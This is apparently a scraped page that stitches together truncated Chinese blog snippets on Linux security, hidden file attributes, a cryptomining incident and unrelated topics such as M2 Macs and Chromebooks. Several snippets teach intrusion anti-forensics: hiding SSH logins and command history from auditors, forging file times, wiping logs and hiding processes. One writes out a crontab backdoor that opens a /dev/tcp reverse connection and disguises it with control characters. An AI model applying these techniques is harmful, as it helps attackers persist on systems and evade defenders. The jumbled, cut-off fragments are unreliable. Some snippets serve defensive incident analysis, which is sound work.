今天来给大家分享下这两天遇到的一个问题,服务器被挖矿了,把我的排查记录分享下,希望能帮到有需要的同学。...问题原因 ---- 多台服务器持续告警CPU过高,服务器为K8s的应用节点,正常情况下CPU使用率都挺低的,通过排查是原因是被挖矿了,下面为定位过程 定位过程 ---- 登陆问题主机10.92.0.X,...cpu使用率基本跑满(用户态),没有发现可疑的进程,初步怀疑可能是进程在哪里隐藏了 执行命令ps -aux --sort=-pcpu|head -10 嗯哼,藏得够深的,可还是被揪出来啦 ? ?...这个eta可能是起的一个守护进程,用于唤起上面圈起来的python进程, 这个脚本的用途是,链接远程服务"http://g.upxmr.com:999/version.txt",并下载 写入到本地隐藏文件.../tmp/.x,然后执行 注意:这个执行文件会修改服务器的一些配置,如dns,hosts,定时任务,创建可执行文件 查看dns 果然dns被修改了 ?
;而现在,我们发现黑客开始不断使用一些隐藏手段去隐藏挖矿进程而使它获得更久存活,今天分析的内容是我们过去一个月内捕获的一起入侵挖矿事件。...我们发现黑客主要是利用 Redis 未授权访问问题进行入侵,对于该问题的说明可以参考我们过去做的一些分析: https://mp.weixin.qq.com/s/inazTPN5mHJYnt2QDliv8w 在服务器被入侵后...在变更文件里可以看到一些挖矿程序,同时 /etc/ld.so.preload 文件的变更需要引起注意,这里涉及到 Linux 动态链接库预加载机制,是一种常用的进程隐藏方法,而 top 等命令都是受这个机制影响的...——段落引自《警惕利用 Linux 预加载型恶意动态链接库的后门》 通过查看文件内容,可以看到加载一个 .so 文件:/usr/local/lib/libjdk.so ?...继续分析变更的文件,还能看到相关文件也被变更,比如黑客通过修改 /etc/rc.d/init.d/network 文件来进行启动: ? 同时修改 /etc/resolv.conf : ?
隐藏权限的介绍 有时候你发现即时使用的是root用户也不能修改某个文件,大部分原因是因为使用过chattr命令锁定了该文件,这个命令的作用很大,通过chattr可以提高系统的安全性,但是这个命令并不适合所有的目录...与我们前面看到的chmod这些命令修改权限不同的是chattr修改的是更底层的属性,这里面我们所提到的隐藏权限指的就是使用chattr来设置属性 隐藏权限的设置和查看 chattr的用户与我们之前讲的chmod...,chow这些命令相似,都是直接对需要修改的文件进行操作就可以了 chattr命令:为文件设置隐藏权限 命令选项 + 增加权限 - 删除权限 = 赋予什么权限,文件最终权限 A 文件或目录的atime不可被修改...lsattr命令: 查看文件隐藏权限 通过案例学习命令用法: 给file1文件添加AaiSd权限 [root@zutuanxue test]# chattr +AaiSd file1 查看文件file1...隐藏权限 [root@zutuanxue test]# lsattr file1 --S-iadA---------- file1 设置删除file1文件隐藏权限 - 可以使用-号 - 可以使用
文件的隐藏权限 除了文件的读写,执行权限外,linux还有一种隐藏权限,设置隐藏权限可以防止一些其他用户的误操作或者恶意操作,当我们配置了nginx的放跨站攻击或其他安全措施后,相应的会在项目的根目录下生成一个隐藏文件....user.ini,当删除整个项目时会阻止操作完成.我们使用ls命令并使用chmod chown等命令设置了文件权限后会发现还是无法删除.这就是因为这个文件有隐藏的权限 查看文件的隐藏权限类型 命令:...12 X:可以直接访问压缩文件的内容 13 e: 表示文件以ext4 extents存储的,ext4上新建文件的默认属性,不可用chattr修改 取消或添加文件的隐藏权限 使用+ -加权限类型即可设置文件的隐藏权限...chattr -i //减去文件的 i 隐藏数字属性,然后即可使用rm 正常删除 chattr +i //添加隐藏权限
Linux 系统中的文件除了具备一般权限和特殊权限之外,还有一种隐藏权限,即被隐藏起来的权限,默认情况下不能直接被用户发觉。...有用户曾经在生产环境中碰到过明明权限充足但却无法删除某个文件的情况,或者仅能在日志文件中追加内容而不能修改或删除内容的情况,这在一定程度上阻止了黑客篡改系统日志的图谋,因此这种“奇怪”的文件权限也保障了 Linux...既然叫隐藏权限,那么使用常规的 ls 命令肯定不能看到它的真面目。隐藏权限的专用查看命令是 lsattr,专用设置命令是 chattr。...如果想要把某个隐藏功能添加到文件上,则需要在命令后面追加 “ +参数 ” ,如果想要把某个隐藏功能移出文件,则需要追加 “ -参数 ” 。...一般会将 -a 参数设置到日志文件(/var/log/messages)上,这样可在不影响系统正常写入日志的前提下,防止被擦除。
C语言和操作系统原本就是两门正交的课程,你可以认为它们是无关的,C函数可以在没有操作系统的单片机上被调用,但是fork似乎不行。...或者至少,Linux不也还有clone调用么?...Linux内核是一个类UNIX系统内核,而且代码唾手可得,懂它的人也不在少数,现如今只要提到UNIX,Linux均可作为替代,也就是说,AIX,Solaris,HP-HX这种老牌经典UNIX太不容易得到了...,而且也没有x86版本,所以一般都用Linux来替代。...我们知道,我们在用户态进程里申请的每一块内存,在内核中均以vm_area_struct对象被维护,如果我调用了10000次mmap,那就有10000个vm_area_struct对象被创建,在fork调用中
Linux下文件的隐藏属性 linux除了9个权限外,还有些隐藏属性, 使用chattr命令来设置 chattr 设置文件的隐藏属性 #chattr [+-=] [ASacdistu] 文件或目录...lsattr 显示文件隐藏属性 #lsattr [-adR] 文件或目录 参数: -a :将隐藏属性也显示出来 -d :如果接的是目录,仅列出目录本身的属性而非目录内的文件名 -R :连同子目录的数据也一并列出
发布者:全栈程序员栈长,转载请注明出处:https://javaforall.cn/149135.html原文链接:https://javaforall.cn
linux下历史命令通常有两大用处,一个是快速复用,另外是审计,快速复用在之前的文章linux命令行技巧中提过,有兴趣的可以去看看,今天主要说审计部分,分两部分:记录历史命令和隐藏命令行历史,分别针对运维防护及入侵渗透...,下面分别介绍 记录所有用户历史命令 原本的linux默认记录1000条历史记录,且只记录命令,完全没办法做审计,当遇到服务器入侵等情况,做审计工作时,如果你没有开启audit,或其他第三方审计工具,在通过...你还可以在这里增加用户,以及客户端IP等 隐藏你的命令行历史 相对于命令行记录,隐藏命令行历史,除了在渗透测试中使用,还有一些使用场景,比如特权命令不想被别人看到,或者比较重要的命令不希望在浏览历史命令时被误执行...然后再通过set -o history的方式,开启history,这种方式的好处在于,你不必全部清除所有历史命令,这样在渗透过程中可以灵活屏蔽不想被记录的命令,而不会被审计人员发现 history命令管理...不过这种方式会留个小马脚 ok,以上就是今天要介绍的linux下命令历史记录的保存及隐藏方式
隐藏crontab命令 我们清除之前的cron, 使用如下命令隐藏你的后门 (crontab-l;printf"*/60 * * * * exec 9 /dev/tcp/127.0.0.1/8888...使用 cat-A xxx 就可以看到隐藏的后门了。 ? 原理 原理就是cat一些比如 \r 回车符 \n 换行符 \f 换页符这些符号导致了隐藏。 这里用python制作一个隐藏的sh。...> oops" # 隐藏 cmd_v = "echo 'You see me!'"
一般的Linux下的隐藏目录使用命令ls -l是查看不出来的,只能查看到文件及文件夹查看Linux下的隐藏文件需要用到命令ls -al?
本文将会分享如下 6个linux痕迹隐藏技巧,来跟蓝队来一场斗智斗勇吧 隐藏远程SSH登陆记录 清除当前的history记录 隐藏Vim的操作记录 隐藏文件修改时间 锁定文件 清除系统日志痕迹 1. 隐藏远程SSH登陆记录 隐身登录系统,不会被w、last等指令检测到。...清除当前的history记录 如果我们不希望命令被记录,在退出会话前直接执行: # 清除当前会话的命令历史记录 history -r # 或者 不给当前的shell留时间去处理,内存的命令也就没时间写入到文件...但是稍微有经验的管理员使用stat或者 find ./ -ctime 0 -name "*.php" 就会发现这里的问题 # 查找24小时内被创建的php文件 find ./ -ctime 0 -name...清除系统日志痕迹 Linux 系统存在多种日志文件,来记录系统运行过程中产生的日志 清除系统日志痕迹 /var/log/btmp 记录所有登录失败信息,使用lastb命令查看 /var/log/lastlog
在搭载 M1 芯片的 Mac 上成功运行 Linux 之后,现在 M2 芯片也能跑 Linux 系统了!...M2 MacBook Air。...在 Asahi Linux 的帮助下,Torvalds 在他的 M2 MacBook 上运行 Linux,Asahi Linux 一直致力于对苹果的硬件进行逆向工程。...Asahi 团队的目标是将所有这些研究向上游发送到主 Linux kernel 中,以便所有发行版都能受益,并且 Asahi 团队对苹果芯片(如 M2 或 M1 Ultra)添加了支持。...2020 年 Torvalds 曾经写道:当时推出的 M1 Air 作为 Arm Linux 笔记本电脑可以说是完美的,但那时我没有时间更新 Linux kernel。
这几天温习下 Linux 基础知识,基础里面较为薄弱的知识点我会在这里记录一下,以便回头查看 ---- Linux 下的文件除了权限属性,还有一些隐藏属性,必须使用lsattr来显示,如下所示: [root...如果要设置文件的隐藏属性,需要使用chattr命令。这里介绍几个常用的隐藏属性,第一种是a属性。拥有这种属性的文件只能在尾部增加数据而不能被删除。...个人觉得用于重要的日志类文件非常不错,即可以继续追加内容,又可以避免被恶意删除。...更多隐藏属性请使用man chattr查看。
Google Chromebook 运行在 Linux 系统之上,但通常它运行的 Linux 系统对普通用户而言,并不是十分容易就能访问得到。...Linux 被用作基于开源的 Chromium OS 运行时环境的后端技术,然后 Google 将其转换为 Chrome OS。...然而,在这一切的背后,有一个 Linux 系统等待被你发现。...启用 Linux 还需要为 Linux 预留硬盘空间,因此无论你的 Chromebook 硬盘容量是多少,都将减少一半或四分之一(自主选择)。...在 Chromebook 上接入 Linux 仍被 Google 视为测试版功能,因此你必须选择使用开发者模式。
Linux 被用作基于开源的 Chromium OS 运行时环境的后端技术,然后 Google 将其转换为 Chrome OS。...在 Chromebook 上接入 Linux 仍被 Google 视为测试版功能,因此你必须选择使用开发者模式。...要做到这一点,请打开 设置,然后单击左侧列表中的 Linux Beta。 激活 Linux Beta,并为你的 Linux 系统和应用程序分配一些硬盘空间。...与 Linux 共享文件和设备 Linux Beta 环境运行在 容器 中,因此 Chrome OS 需要获得访问 Linux 文件的权限。...image.png 学习 Linux 如果你肯花时间学习 Linux,你不仅能够解锁你 Chromebook 中隐藏的潜力,还能最终学到很多关于计算机的知识。
作者 | dog250 原文 | https://blog.csdn.net/dog250/article/details/108032383 总有朋友问隐藏Linux进程的方法,我说你想隐藏到什么程度...本文介绍一种将Linux进程小隐于用户的非常规方法,仅仅一行代码: 修改掉进程的pid即可。 注意是小隐,所以,不值得反制,逗一下高级会议工程师搞个恶作剧玩玩得了。...如果你觉得 guru 模式的 stap 怪怪的,那么你完全可以编写自己独立的 Linux kernel module,采用修改完即退的方法: target->pid = xxxx; return -1;...简单的说一下原理: task被创建的时候,根据其pid注册procfs目录结构。 展示procfs目录结构的时候,遍历task list以其pid作为key来查找procfs目录结构。
0x00 前言 攻击者在获取服务器权限后,会通过一些技巧来隐藏自己的踪迹和后门文件,本文介绍Linux下的几种隐藏技术。...0x01 隐藏文件 Linux 下创建一个隐藏文件:touch .test.txt touch 命令可以创建一个文件,文件名前面加一个 点 就代表是隐藏文件,如下图: ?...一般的Linux下的隐藏目录使用命令ls -l是查看不出来的,只能查看到文件及文件夹,查看Linux下的隐藏文件需要用到命令:ls -al 这里,我们可以看到在/tmp下,默认存在多个隐藏目录,这些目录是恶意文件常用来藏身的地方...0x03 隐藏历史操作命令 在shell中执行的命令,不希望被记录在命令行历史中,如何在linux中开启无痕操作模式呢?...如何在Linux中发现隐藏的进程? unhide 是一个小巧的网络取证工具,能够发现那些借助rootkit,LKM及其它技术隐藏的进程和TCP / UDP端口。
未来几个月,搭载 M2 系列芯片的 Mac 电脑可能要「落地」了。...另据知情人士的证实,苹果正在使用来自 App Store 的第三方应用测试至少九款新的 Mac 电脑,这些 Mac 搭载了 4 种不同型号的 M2 芯片——M2、M2 Pro、M2 Max 和 M2 Ultra...可能配备 M2 系列芯片的九款机型 苹果被曝正在进行内部测试的具体机型包括如下: 代号为 J413 的 MacBook Air,搭载 M2 芯片,拥有 8 个 CPU 核心和 10 个 GPU 核心。...J414 的 14 英寸 MacBook Pro,搭载 M2 Pro 和 M2 Max 芯片。...(M2 Ultra)。
编辑Apache的配置文件 vim /etc/httpd/conf/httpd.conf 添加ServerTokens prod这一行 重启Apache服务...
领取专属 10元无门槛券
手把手带您无忧上云
云服务器
ICP备案
对象存储
腾讯会议
云直播
